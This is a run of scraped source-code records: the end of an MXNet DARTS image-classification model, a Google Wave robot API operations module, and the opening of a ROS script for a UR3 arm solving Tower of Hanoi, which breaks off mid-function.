op2(y2)\n s = y1 + y2\n states += [s]\n x_out = F.concat(*[states[i] for i in self.concat], dim=1)\n return x_out\n\n\nclass DartsUnit(HybridBlock):\n \"\"\"\n DARTS unit.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n prev_in_channels : int\n Number of input channels in previous input.\n out_channels : int\n Number of output channels.\n genotype : list of tuples (str, int)\n List of genotype elements (operations and linked indices).\n reduction : bool\n Whether use reduction.\n prev_reduction : bool\n Whether use previous reduction.\n \"\"\"\n def __init__(self,\n in_channels,\n prev_in_channels,\n out_channels,\n genotype,\n reduction,\n prev_reduction,\n **kwargs):\n super(DartsUnit, self).__init__(**kwargs)\n mid_channels = out_channels // 4\n\n with self.name_scope():\n if prev_reduction:\n self.preprocess_prev = DartsReduceBranch(\n in_channels=prev_in_channels,\n out_channels=mid_channels)\n else:\n self.preprocess_prev = darts_conv1x1(\n in_channels=prev_in_channels,\n out_channels=mid_channels)\n\n self.preprocess = darts_conv1x1(\n in_channels=in_channels,\n out_channels=mid_channels)\n\n self.body = DartsMainBlock(\n genotype=genotype,\n channels=mid_channels,\n reduction=reduction)\n\n def hybrid_forward(self, F, x, x_prev):\n x = self.preprocess(x)\n x_prev = self.preprocess_prev(x_prev)\n x_out = self.body(x, x_prev)\n return x_out\n\n\nclass DARTS(HybridBlock):\n \"\"\"\n DARTS model from 'DARTS: Differentiable Architecture Search,' https://arxiv.org/abs/1806.09055.\n\n Parameters:\n ----------\n channels : list of list of int\n Number of output channels for each unit.\n stem_blocks_channels : int\n Number of output channels for the Stem units.\n in_channels : int, default 3\n Number of input channels.\n in_size : tuple of two ints, default (224, 224)\n Spatial size of the expected input image.\n classes : int, default 1000\n Number of classification classes.\n \"\"\"\n def __init__(self,\n channels,\n stem_blocks_channels,\n normal_genotype,\n reduce_genotype,\n in_channels=3,\n in_size=(224, 224),\n classes=1000,\n **kwargs):\n super(DARTS, self).__init__(**kwargs)\n self.in_size = in_size\n self.classes = classes\n\n with self.name_scope():\n self.features = nasnet_dual_path_sequential(\n return_two=False,\n first_ordinals=2,\n last_ordinals=1)\n self.features.add(Stem1Unit(\n in_channels=in_channels,\n out_channels=stem_blocks_channels))\n in_channels = stem_blocks_channels\n self.features.add(stem2_unit(\n in_channels=in_channels,\n 
out_channels=stem_blocks_channels))\n prev_in_channels = in_channels\n in_channels = stem_blocks_channels\n\n for i, channels_per_stage in enumerate(channels):\n stage = nasnet_dual_path_sequential(prefix=\"stage{}_\".format(i + 1))\n for j, out_channels in enumerate(channels_per_stage):\n reduction = (i != 0) and (j == 0)\n prev_reduction = ((i == 0) and (j == 0)) or ((i != 0) and (j == 1))\n genotype = reduce_genotype if reduction else normal_genotype\n stage.add(DartsUnit(\n in_channels=in_channels,\n prev_in_channels=prev_in_channels,\n out_channels=out_channels,\n genotype=genotype,\n reduction=reduction,\n prev_reduction=prev_reduction))\n prev_in_channels = in_channels\n in_channels = out_channels\n self.features.add(stage)\n self.features.add(nn.AvgPool2D(\n pool_size=7,\n strides=1))\n\n self.output = nn.HybridSequential(prefix=\"\")\n self.output.add(nn.Flatten())\n self.output.add(nn.Dense(\n units=classes,\n in_units=in_channels))\n\n def hybrid_forward(self, F, x):\n x = self.features(x)\n x = self.output(x)\n return x\n\n\ndef get_darts(model_name=None,\n pretrained=False,\n ctx=cpu(),\n root=os.path.join(\"~\", \".mxnet\", \"models\"),\n **kwargs):\n \"\"\"\n Create DARTS model with specific parameters.\n\n Parameters:\n ----------\n model_name : str or None, default None\n Model name for loading pretrained model.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n ctx : Context, default CPU\n The context in which to load the pretrained weights.\n root : str, default '~/.mxnet/models'\n Location for keeping the model parameters.\n \"\"\"\n stem_blocks_channels = 48\n layers = [4, 5, 5]\n channels_per_layers = [192, 384, 768]\n channels = [[ci] * li for (ci, li) in zip(channels_per_layers, layers)]\n\n normal_genotype = [\n ('sep_conv_3x3', 0),\n ('sep_conv_3x3', 1),\n ('sep_conv_3x3', 0),\n ('sep_conv_3x3', 1),\n ('sep_conv_3x3', 1),\n ('skip_connect', 0),\n ('skip_connect', 0),\n ('dil_conv_3x3', 2)]\n reduce_genotype = [\n ('max_pool_3x3', 0),\n ('max_pool_3x3', 1),\n ('skip_connect', 2),\n ('max_pool_3x3', 1),\n ('max_pool_3x3', 0),\n ('skip_connect', 2),\n ('skip_connect', 2),\n ('max_pool_3x3', 1)]\n\n net = DARTS(\n channels=channels,\n stem_blocks_channels=stem_blocks_channels,\n normal_genotype=normal_genotype,\n reduce_genotype=reduce_genotype,\n **kwargs)\n\n if pretrained:\n if (model_name is None) or (not model_name):\n raise ValueError(\"Parameter `model_name` should be properly initialized for loading pretrained model.\")\n from .model_store import get_model_file\n net.load_parameters(\n filename=get_model_file(\n model_name=model_name,\n local_model_store_dir_path=root),\n ctx=ctx)\n\n return net\n\n\ndef darts(**kwargs):\n \"\"\"\n DARTS model from 'DARTS: Differentiable Architecture Search,' https://arxiv.org/abs/1806.09055.\n\n Parameters:\n ----------\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n ctx : Context, default CPU\n The context in which to load the pretrained weights.\n root : str, default '~/.mxnet/models'\n Location for keeping the model parameters.\n \"\"\"\n return get_darts(model_name=\"darts\", **kwargs)\n\n\ndef _test():\n import numpy as np\n import mxnet as mx\n\n pretrained = False\n\n models = [\n darts,\n ]\n\n for model in models:\n\n net = model(pretrained=pretrained)\n\n ctx = mx.cpu()\n if not pretrained:\n net.initialize(ctx=ctx)\n\n net_params = net.collect_params()\n weight_count = 0\n for param in net_params.values():\n if (param.shape is None) or 
(not param._differentiable):\n continue\n weight_count += np.prod(param.shape)\n print(\"m={}, {}\".format(model.__name__, weight_count))\n assert (model != darts or weight_count == 4718752)\n\n x = mx.nd.zeros((1, 3, 224, 224), ctx=ctx)\n y = net(x)\n assert (y.shape == (1, 1000))\n\n\nif __name__ == \"__main__\":\n _test()\n","repo_name":"osmr/imgclsmob","sub_path":"gluon/gluoncv2/models/darts.py","file_name":"darts.py","file_ext":"py","file_size_in_byte":21552,"program_lang":"python","lang":"en","doc_type":"code","stars":2864,"dataset":"github-code","pt":"37"} +{"seq_id":"70982471468","text":"import errors\nimport random\nimport util\nimport sys\n\n\nPROTOCOL_VERSION = '0.22'\n\n# Operation Types\nWAVELET_APPEND_BLIP = 'wavelet.appendBlip'\nWAVELET_SET_TITLE = 'wavelet.setTitle'\nWAVELET_ADD_PARTICIPANT = 'wavelet.participant.add'\nWAVELET_DATADOC_SET = 'wavelet.datadoc.set'\nWAVELET_MODIFY_TAG = 'wavelet.modifyTag'\nWAVELET_MODIFY_PARTICIPANT_ROLE = 'wavelet.modifyParticipantRole'\nBLIP_CONTINUE_THREAD = 'blip.continueThread'\nBLIP_CREATE_CHILD = 'blip.createChild'\nBLIP_DELETE = 'blip.delete'\nDOCUMENT_APPEND_MARKUP = 'document.appendMarkup'\nDOCUMENT_INLINE_BLIP_INSERT = 'document.inlineBlip.insert'\nDOCUMENT_MODIFY = 'document.modify'\nROBOT_CREATE_WAVELET = 'robot.createWavelet'\nROBOT_FETCH_WAVE = 'robot.fetchWave'\nROBOT_NOTIFY = 'robot.notify'\nROBOT_SEARCH = 'robot.search'\n\n# Assign always NOTIFY_OP_ID to the notify operation so\n# we can easily filter it out later\nNOTIFY_OP_ID = '0'\n\nclass Operation(object):\n \"\"\"Represents a generic operation applied on the server.\n\n This operation class contains data that is filled in depending on the\n operation type.\n\n It can be used directly, but doing so will not result\n in local, transient reflection of state on the blips. In other words,\n creating a 'delete blip' operation will not remove the blip from the local\n context for the duration of this session. It is better to use the OpBased\n model classes directly instead.\n \"\"\"\n\n def __init__(self, method, opid, params):\n \"\"\"Initializes this operation with contextual data.\n\n Args:\n method: Method to call or type of operation.\n opid: The id of the operation. Any callbacks will refer to these.\n params: An operation type dependent dictionary\n \"\"\"\n self.method = method\n self.id = opid\n self.params = params\n\n def __str__(self):\n return '%s[%s]%s' % (self.method, self.id, str(self.params))\n\n def set_param(self, param, value):\n self.params[param] = value\n return self\n\n def serialize(self, method_prefix=''):\n \"\"\"Serialize the operation.\n\n Args:\n method_prefix: prefixed for each method name to allow for specifying\n a namespace.\n\n Returns:\n a dict representation of the operation.\n \"\"\"\n if method_prefix and not method_prefix.endswith('.'):\n method_prefix += '.'\n return {'method': method_prefix + self.method,\n 'id': self.id,\n 'params': util.serialize(self.params)}\n\n def set_optional(self, param, value):\n \"\"\"Sets an optional parameter.\n\n If value is None or \"\", this is a no op. Otherwise it calls\n set_param.\n \"\"\"\n if value == '' or value is None:\n return self\n else:\n return self.set_param(param, value)\n\n\nclass OperationQueue(object):\n \"\"\"Wraps the queuing of operations using easily callable functions.\n\n The operation queue wraps single operations as functions and queues the\n resulting operations in-order. 
Typically there shouldn't be a need to\n call this directly unless operations are needed on entities outside\n of the scope of the robot. For example, to modify a blip that\n does not exist in the current context, you might specify the wave, wavelet\n and blip id to generate an operation.\n\n Any calls to this will not be reflected in the robot in any way.\n For example, calling wavelet_append_blip will not result in a new blip\n being added to the robot, only an operation to be applied on the\n server.\n \"\"\"\n\n # Some class global counters:\n _next_operation_id = 1\n\n def __init__(self, proxy_for_id=None):\n self.__pending = []\n self._capability_hash = None\n self._proxy_for_id = proxy_for_id\n\n def _new_blipdata(self, wave_id, wavelet_id, initial_content='',\n parent_blip_id=None):\n \"\"\"Creates JSON of the blip used for this session.\"\"\"\n temp_blip_id = 'TBD_%s_%s' % (wavelet_id,\n hex(random.randint(0, sys.maxint)))\n return {'waveId': wave_id,\n 'waveletId': wavelet_id,\n 'blipId': temp_blip_id,\n 'content': initial_content,\n 'parentBlipId': parent_blip_id}\n\n def _new_waveletdata(self, domain, participants):\n \"\"\"Creates an ephemeral WaveletData instance used for this session.\n\n Args:\n domain: the domain to create the data for.\n participants: initial participants on the wavelet\n Returns:\n Blipdata (for the rootblip), WaveletData.\n \"\"\"\n wave_id = domain + '!TBD_%s' % hex(random.randint(0, sys.maxint))\n wavelet_id = domain + '!conv+root'\n root_blip_data = self._new_blipdata(wave_id, wavelet_id)\n participants = set(participants)\n wavelet_data = {'waveId': wave_id,\n 'waveletId': wavelet_id,\n 'rootBlipId': root_blip_data['blipId'],\n 'participants': participants}\n return root_blip_data, wavelet_data\n\n def __len__(self):\n return len(self.__pending)\n\n def __iter__(self):\n return self.__pending.__iter__()\n\n def clear(self):\n self.__pending = []\n\n def proxy_for(self, proxy):\n \"\"\"Return a view of this operation queue with the proxying for set to proxy.\n\n This method returns a new instance of an operation queue that shares the\n operation list, but has a different proxying_for_id set so the robot using\n this new queue will send out operations with the proxying_for field set.\n \"\"\"\n res = OperationQueue()\n res.__pending = self.__pending\n res._capability_hash = self._capability_hash\n res._proxy_for_id = proxy\n return res\n\n def set_capability_hash(self, capability_hash):\n self._capability_hash = capability_hash\n\n def serialize(self, method_prefix=''):\n first = Operation(ROBOT_NOTIFY,\n NOTIFY_OP_ID,\n {'capabilitiesHash': self._capability_hash,\n 'protocolVersion': PROTOCOL_VERSION})\n operations = [first] + self.__pending\n return [op.serialize(method_prefix=method_prefix) for op in operations]\n\n def copy_operations(self, other_queue):\n \"\"\"Copy the pending operations from other_queue into this one.\"\"\"\n for op in other_queue:\n self.__pending.append(op)\n\n def new_operation(self, method, wave_id, wavelet_id, props=None, **kwprops):\n \"\"\"Creates and adds a new operation to the operation list.\"\"\"\n if props is None:\n props = {}\n props.update(kwprops)\n if wave_id is not None:\n props['waveId'] = wave_id\n if wavelet_id is not None:\n props['waveletId'] = wavelet_id\n if self._proxy_for_id:\n props['proxyingFor'] = self._proxy_for_id\n operation = Operation(method,\n 'op%s' % OperationQueue._next_operation_id,\n props)\n self.__pending.append(operation)\n 
OperationQueue._next_operation_id += 1\n return operation\n\n def wavelet_append_blip(self, wave_id, wavelet_id, initial_content=''):\n \"\"\"Appends a blip to a wavelet.\n\n Args:\n wave_id: The wave id owning the containing wavelet.\n wavelet_id: The wavelet id that this blip should be appended to.\n initial_content: optionally the content to start with\n\n Returns:\n JSON representing the information of the new blip.\n \"\"\"\n blip_data = self._new_blipdata(wave_id, wavelet_id, initial_content)\n self.new_operation(WAVELET_APPEND_BLIP, wave_id,\n wavelet_id, blipData=blip_data)\n return blip_data\n\n def wavelet_add_participant(self, wave_id, wavelet_id, participant_id):\n \"\"\"Adds a participant to a wavelet.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n participant_id: Id of the participant to add.\n\n Returns:\n data for the root_blip, wavelet\n \"\"\"\n return self.new_operation(WAVELET_ADD_PARTICIPANT, wave_id, wavelet_id,\n participantId=participant_id)\n\n def wavelet_datadoc_set(self, wave_id, wavelet_id, name, data):\n \"\"\"Sets a key/value pair on the data document of a wavelet.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n name: The key name for this data.\n data: The value of the data to set.\n Returns:\n The operation created.\n \"\"\"\n return self.new_operation(WAVELET_DATADOC_SET, wave_id, wavelet_id,\n datadocName=name, datadocValue=data)\n\n def robot_create_wavelet(self, domain, participants=None, message=''):\n \"\"\"Creates a new wavelet.\n\n Args:\n domain: the domain to create the wave in\n participants: initial participants on this wavelet or None if none\n message: an optional payload that is returned with the corresponding\n event.\n\n Returns:\n data for the root_blip, wavelet\n \"\"\"\n if participants is None:\n participants = []\n blip_data, wavelet_data = self._new_waveletdata(domain, participants)\n op = self.new_operation(ROBOT_CREATE_WAVELET,\n wave_id=wavelet_data['waveId'],\n wavelet_id=wavelet_data['waveletId'],\n waveletData=wavelet_data)\n op.set_optional('message', message)\n return blip_data, wavelet_data\n\n def robot_search(self, query, index=None, num_results=None):\n \"\"\"Execute a search request.\n\n For now this only makes sense in the data API. 
Wave does not maintain\n an index for robots so no results will be returned in that scenario.\n\n Args:\n query: what to search for\n index: what index to search from\n num_results: how many results to return\n Returns:\n The operation created.\n \"\"\"\n op = self.new_operation(\n ROBOT_SEARCH, wave_id=None, wavelet_id=None, query=query)\n if index is not None:\n op.set_param('index', index)\n if num_results is not None:\n op.set_param('numResults', num_results)\n return op\n\n def robot_fetch_wave(self, wave_id, wavelet_id,\n raw_deltas_from_version=-1, return_raw_snapshot=False):\n \"\"\"Requests a snapshot of the specified wavelet.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n raw_deltas_from_version: If specified, return a raw dump of the\n delta history of this wavelet, starting at the given version.\n This may return only part of the history; use additional\n requests with higher raw_deltas_from_version parameters to\n get the rest.\n return_raw_snapshot: if true, return the raw data for this\n wavelet.\n Returns:\n The operation created.\n \"\"\"\n op = self.new_operation(ROBOT_FETCH_WAVE, wave_id, wavelet_id)\n if raw_deltas_from_version != -1:\n op.set_param('rawDeltasFromVersion', raw_deltas_from_version)\n if return_raw_snapshot:\n op.set_param('returnRawSnapshot', return_raw_snapshot)\n return op\n\n def wavelet_set_title(self, wave_id, wavelet_id, title):\n \"\"\"Sets the title of a wavelet.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n title: The title to set.\n Returns:\n The operation created.\n \"\"\"\n return self.new_operation(WAVELET_SET_TITLE, wave_id, wavelet_id,\n waveletTitle=title)\n\n def wavelet_modify_participant_role(\n self, wave_id, wavelet_id, participant_id, role):\n \"\"\"Modify the role of a participant on a wavelet.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n participant_id: Id of the participant to add.\n role: the new roles\n\n Returns:\n data for the root_blip, wavelet\n \"\"\"\n return self.new_operation(WAVELET_MODIFY_PARTICIPANT_ROLE, wave_id,\n wavelet_id, participantId=participant_id,\n participantRole=role)\n\n def wavelet_modify_tag(self, wave_id, wavelet_id, tag, modify_how=None):\n \"\"\"Modifies a tag in a wavelet.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n tag: The tag (a string).\n modify_how: (optional) how to apply the tag. The default is to add\n the tag. Specify 'remove' to remove. 
Specify None or 'add' to\n add.\n Returns:\n The operation created.\n \"\"\"\n return self.new_operation(WAVELET_MODIFY_TAG, wave_id, wavelet_id,\n name=tag).set_optional(\"modify_how\", modify_how)\n\n def blip_create_child(self, wave_id, wavelet_id, blip_id):\n \"\"\"Creates a child blip of another blip.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n blip_id: The blip id that this operation is applied to.\n\n Returns:\n JSON of blip for which further operations can be applied.\n \"\"\"\n blip_data = self._new_blipdata(wave_id, wavelet_id, parent_blip_id=blip_id)\n self.new_operation(BLIP_CREATE_CHILD, wave_id, wavelet_id,\n blipId=blip_id,\n blipData=blip_data)\n return blip_data\n\n def blip_continue_thread(self, wave_id, wavelet_id, blip_id):\n \"\"\"Creates a blip in same thread as specified blip.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n blip_id: The blip id that this operation is applied to.\n\n Returns:\n JSON of blip for which further operations can be applied.\n \"\"\"\n blip_data = self._new_blipdata(wave_id, wavelet_id)\n self.new_operation(BLIP_CONTINUE_THREAD, wave_id, wavelet_id,\n blipId=blip_id,\n blipData=blip_data)\n return blip_data\n\n\n def blip_delete(self, wave_id, wavelet_id, blip_id):\n \"\"\"Deletes the specified blip.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n blip_id: The blip id that this operation is applied to.\n Returns:\n The operation created.\n \"\"\"\n return self.new_operation(BLIP_DELETE, wave_id, wavelet_id, blipId=blip_id)\n\n def document_append_markup(self, wave_id, wavelet_id, blip_id, content):\n \"\"\"Appends content with markup to a document.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n blip_id: The blip id that this operation is applied to.\n content: The markup content to append.\n Returns:\n The operation created.\n \"\"\"\n return self.new_operation(DOCUMENT_APPEND_MARKUP, wave_id, wavelet_id,\n blipId=blip_id, content=content)\n\n def document_modify(self, wave_id, wavelet_id, blip_id):\n \"\"\"Creates and queues a document modify operation\n\n The returned operation still needs to be filled with details before\n it makes sense.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n blip_id: The blip id that this operation is applied to.\n Returns:\n The operation created.\n \"\"\"\n return self.new_operation(DOCUMENT_MODIFY,\n wave_id,\n wavelet_id,\n blipId=blip_id)\n\n def document_inline_blip_insert(self, wave_id, wavelet_id, blip_id, position):\n \"\"\"Inserts an inline blip at a specific location.\n\n Args:\n wave_id: The wave id owning that this operation is applied to.\n wavelet_id: The wavelet id that this operation is applied to.\n blip_id: The blip id that this operation is applied to.\n position: The position in the document to insert the blip.\n\n Returns:\n JSON data for the blip that was created for further operations.\n \"\"\"\n inline_blip_data = self._new_blipdata(wave_id, wavelet_id)\n inline_blip_data['parentBlipId'] = blip_id\n self.new_operation(DOCUMENT_INLINE_BLIP_INSERT, wave_id, wavelet_id,\n blipId=blip_id,\n index=position,\n 
blipData=inline_blip_data)\n return inline_blip_data\n","repo_name":"jparyani/wave","sub_path":"src/python/api/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":16445,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"72221227308","text":"#!/usr/bin/env python\n\n'''\nWe get inspirations of Tower of Hanoi algorithm from the website below.\nThis is also on the lab manual.\nSource: https://www.cut-the-knot.org/recurrence/hanoi.shtml\n'''\n\nimport os\nimport argparse\nimport copy\nimport time\nimport rospy\nimport rospkg\nimport numpy as np\nimport yaml\nimport sys\nfrom math import pi\nfrom project_header import *\nimport numpy as np\nfrom scipy.linalg import expm\nPI = 3.1415926535\n\n# 20Hz\nSPIN_RATE = 20\n\n# UR3 home location\n# home = np.radians([120, -90, 90, -90, -90, 0])\n\nhome = np.radians([151.30, -107.46, 116.14, -101.53, -92.15, 35.33])\n\n# Hanoi tower location 1\n# Q11 = [120*pi/180.0, -56*pi/180.0, 124*pi/180.0, -158*pi/180.0, -90*pi/180.0, 0*pi/180.0]\n# Q12 = [120*pi/180.0, -64*pi/180.0, 123*pi/180.0, -148*pi/180.0, -90*pi/180.0, 0*pi/180.0]\n# Q13 = [120*pi/180.0, -72*pi/180.0, 120*pi/180.0, -137*pi/180.0, -90*pi/180.0, 0*pi/180.0]\n\n\n# 1 - low to high\nQ11 = [136.14*pi/180.0, -61.1*pi/180.0, 141.09*pi/180.0, -173.2*pi/180.0, -90.67*pi/180.0, 19.99*pi/180.0]\nQ12 = [136.15*pi/180.0, -72.61*pi/180.0, 140.01*pi/180.0, -160.59*pi/180.0, -90.81*pi/180.0, 19.97*pi/180.0]\nQ13 = [136.13*pi/180.0, -82.54*pi/180.0, 137.42*pi/180.0, -148.07*pi/180.0, -90.96*pi/180.0, 19.95*pi/180.0]\n# Q13 = [136.12*pi/180.0, -98.74*pi/180.0, 124.83*pi/180.0, -119.29*pi/180.0, -91.22*pi/180.0, 20.04*pi/180.0]\n\n# 2 - low to high\nQ21 = [151.31*pi/180.0, -62.2*pi/180.0, 145.82*pi/180.0, -176.49*pi/180.0, -91.46*pi/180.0, 35.15*pi/180.0]\nQ22 = [151.33*pi/180.0, -74.98*pi/180.0, 144.63*pi/180.0, -162.52*pi/180.0, -91.61*pi/180.0, 35.13*pi/180.0]\nQ23 = [151.33*pi/180.0, -86.37*pi/180.0, 141.51*pi/180.0, -148*pi/180.0, -91.77*pi/180.0, 35.14*pi/180.0]\n\n# 3 - low to high\nQ31 = [169.86*pi/180.0, -61.61*pi/180.0, 143.19*pi/180.0, -173.76*pi/180.0, -92.3*pi/180.0, 53.69*pi/180.0]\nQ32 = [169.88*pi/180.0, -73.47*pi/180.0, 142.09*pi/180.0, -160.8*pi/180.0, -92.44*pi/180.0, 53.67*pi/180.0]\nQ33 = [169.88*pi/180.0, -84.11*pi/180.0, 139.19*pi/180.0, -147.26*pi/180.0, -92.59*pi/180.0, 53.69*pi/180.0]\n\n# starting and ending index to store user input\nstart_idx = 0\nmid_idx = 0\nend_idx = 0\ncounter = 0\nfrom_height = [2, 1, 0, 0, 1, 0, 0]\nto_height = [0, 0, 1, 0, 0, 1, 2]\n\nthetas = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0]\n\ndigital_in_0 = 0 # set to true if gripper is holding block\nanalog_in_0 = 0\n\nsuction_on = True\nsuction_off = False\ncurrent_io_0 = False # last state of the gripper - suction On or Off\ncurrent_position_set = False\n\n# UR3 current position, using home position for initialization\ncurrent_position = copy.deepcopy(home)\n\n\"\"\"\nTODO: Initialize Q matrix\n\"\"\"\n\nQ = [ [Q11, Q12, Q13], \\\n [Q21, Q22, Q23], \\\n [Q31, Q32, Q33] ]\n\n\n\"\"\"\nTODO: define a ROS topic callback funtion for getting the state of suction cup\nWhenever ur3/gripper_input publishes info this callback function is called.\n\"\"\"\ndef gripper_callback(msg):\n global digital_in_0\n global analog_in_0\n\n digital_in_0 = msg.DIGIN\n\n\n\n\n\"\"\"\nWhenever ur3/position publishes info, this callback function is called.\n\"\"\"\ndef position_callback(msg):\n\n global thetas\n global current_position\n global current_position_set\n\n 
thetas[0] = msg.position[0]\n thetas[1] = msg.position[1]\n thetas[2] = msg.position[2]\n thetas[3] = msg.position[3]\n thetas[4] = msg.position[4]\n thetas[5] = msg.position[5]\n\n current_position[0] = thetas[0]\n current_position[1] = thetas[1]\n current_position[2] = thetas[2]\n current_position[3] = thetas[3]\n current_position[4] = thetas[4]\n current_position[5] = thetas[5]\n\n current_position_set = True\n\n# suction on = true, suction off = false\ndef gripper(pub_cmd, loop_rate, io_0):\n\n global SPIN_RATE\n global thetas\n global current_io_0\n global current_position\n\n error = 0\n spin_count = 0\n at_goal = 0\n\n current_io_0 = io_0\n\n driver_msg = command()\n driver_msg.destination = current_position\n driver_msg.v = 1.0\n driver_msg.a = 1.0\n driver_msg.io_0 = io_0\n pub_cmd.publish(driver_msg)\n\n while(at_goal == 0):\n\n if( abs(thetas[0]-driver_msg.destination[0]) < 0.0005 and \\\n abs(thetas[1]-driver_msg.destination[1]) < 0.0005 and \\\n abs(thetas[2]-driver_msg.destination[2]) < 0.0005 and \\\n abs(thetas[3]-driver_msg.destination[3]) < 0.0005 and \\\n abs(thetas[4]-driver_msg.destination[4]) < 0.0005 and \\\n abs(thetas[5]-driver_msg.destination[5]) < 0.0005 ):\n\n at_goal = 1\n\n loop_rate.sleep()\n\n if(spin_count > SPIN_RATE*5):\n\n pub_cmd.publish(driver_msg)\n rospy.loginfo(\"Just published again driver_msg\")\n spin_count = 0\n\n spin_count = spin_count + 1\n\n return error\n\n\n\ndef Get_MS():\n\t# =================== Your code starts here ====================#\n\t# Fill in the correct values for S1~6, as well as the M matrix\n\tM = np.array([[0, -1, 0, 390], [0, 0, -1, 401], [1, 0, 0, 215.5], [0,0,0,1]])\n\n\t# rotation matrix\n\t# given in M as [[0,-1,0],[0,0,1],[1,0,0]] - end effector's x,y,z in base frame's x,y,z\n\n\n\t# q = offset\n\t# q1\n\tq1 = np.array([-150,150,0])\n\t# q2\n\tq2 = np.array([-150,0,162])\n\t# q3\n\tq3 = np.array([94,0,162])\n\t# q4\n\tq4 = np.array([307,0,162])\n\t# q5\n\tq5 = np.array([0,260,162])\n\t# q6\n\tq6 = np.array([390,0,162])\n\n\t# w - rotation axis in base frame\n\t# w1\n\tw1 = np.array([0,0,1])\n\t# w2\n\tw2 = np.array([0,1,0])\n\t# w3\n\tw3 = np.array([0,1,0])\n\t# w4\n\tw4 = np.array([0,1,0])\n\t# w5\n\tw5 = np.array([1,0,0])\n\t# w6\n\tw6 = np.array([0,1,0])\n\n\t# v = -w x q\n\t# v1\n\tv1 = np.cross(-w1, q1)\n\t# v2\n\tv2 = np.cross(-w2, q2)\n\t# v3\n\tv3 = np.cross(-w3, q3)\n\t# v4\n\tv4 = np.cross(-w4, q4)\n\t# v5\n\tv5 = np.cross(-w5, q5)\n\t# v6\n\tv6 = np.cross(-w6, q6)\n\n\t# S = (w, v), w is joint axis and v = -w x q\n\t# S1\n\tS1 = np.array([[0, -1, 0, v1[0]], [1, 0, 0, v1[1]], [0, 0, 0, v1[2]], [0,0,0,0]])\n\t# S1 = [w1, v1]\n\t# S2\n\tS2 = np.array([[0, 0, 1, v2[0]], [0, 0, 0, v2[1]], [-1, 0, 0, v2[2]], [0,0,0,0]])\n\t# S2 = [w2, v2]\n\t# S3\n\tS3 = np.array([[0, 0, 1, v3[0]], [0, 0, 0, v3[1]], [-1, 0, 0, v3[2]], [0,0,0,0]])\n\t# S3 = [w3, v3]\n\t# S4\n\tS4 = np.array([[0, 0, 1, v4[0]], [0, 0, 0, v4[1]], [-1, 0, 0, v4[2]], [0,0,0,0]])\n\t# S4 = [w4, v4]\n\t# S5\n\tS5 = np.array([[0, 0, 0, v5[0]], [0, 0, -1, v5[1]], [0, 1, 0, v5[2]], [0,0,0,0]])\n\t# S5 = [w5, v5]\n\t# S6\n\tS6 = np.array([[0, 0, 1, v6[0]], [0, 0, 0, v6[1]], [-1, 0, 0, v6[2]], [0,0,0,0]])\n\t# S6 = [w6, v6]\n\n\tS = [S1, S2, S3, S4, S5, S6]\n\n\n\t# ==============================================================#\n\treturn M, S\n\n\n\"\"\"\nFunction that calculates encoder numbers for each motor\n\"\"\"\ndef lab_fk(theta1, theta2, theta3, theta4, theta5, theta6):\n\n\t# Initialize the return_value\n\treturn_value = [None, None, None, None, 
None, None]\n\n\t# =========== Implement joint angle to encoder expressions here ===========\n\tprint(\"Foward kinematics calculated:\\n\")\n\n\t# =================== Your code starts here ====================#\n\n\tM, S = Get_MS()\n\tt1 = np.matmul(expm(S[0] * theta1), expm(S[1] * theta2))\n\tt2 = np.matmul(t1, expm(S[2] * theta3))\n\tt3 = np.matmul(t2, expm(S[3] * theta4))\n\tt4 = np.matmul(t3, expm(S[4] * theta5))\n\tt5 = np.matmul(t4, expm(S[5] * theta6))\n\tT = np.matmul(t5, M)\n\n\n\n\n\n\t# ==============================================================#\n\n\tprint(str(T) + \"\\n\")\n\n\treturn_value[0] = theta1 + PI\n\treturn_value[1] = theta2\n\treturn_value[2] = theta3\n\treturn_value[3] = theta4 - (0.5*PI)\n\treturn_value[4] = theta5\n\treturn_value[5] = theta6\n\n\treturn return_value\n\n\n\n\ndef move_arm(pub_cmd, loop_rate, dest, vel, accel):\n\n global thetas\n global SPIN_RATE\n\n error = 0\n spin_count = 0\n at_goal = 0\n\n driver_msg = command()\n driver_msg.destination = dest\n driver_msg.v = vel\n driver_msg.a = accel\n driver_msg.io_0 = current_io_0\n pub_cmd.publish(driver_msg)\n\n loop_rate.sleep()\n\n while(at_goal == 0):\n\n if( abs(thetas[0]-driver_msg.destination[0]) < 0.0005 and \\\n abs(thetas[1]-driver_msg.destination[1]) < 0.0005 and \\\n abs(thetas[2]-driver_msg.destination[2]) < 0.0005 and \\\n abs(thetas[3]-driver_msg.destination[3]) < 0.0005 and \\\n abs(thetas[4]-driver_msg.destination[4]) < 0.0005 and \\\n abs(thetas[5]-driver_msg.destination[5]) < 0.0005 ):\n\n at_goal = 1\n rospy.loginfo(\"Goal is reached!\")\n\n loop_rate.sleep()\n\n if(spin_count > SPIN_RATE*5):\n\n pub_cmd.publish(driver_msg)\n rospy.loginfo(\"Just published again driver_msg\")\n spin_count = 0\n\n spin_count = spin_count + 1\n\n return error\n\n\ndef move_block(pub_cmd, loop_rate, start_loc, start_height, \\\n end_loc, end_height):\n global Q\n global home\n global digital_in_0\n\n error = 0\n\n # move arm to home 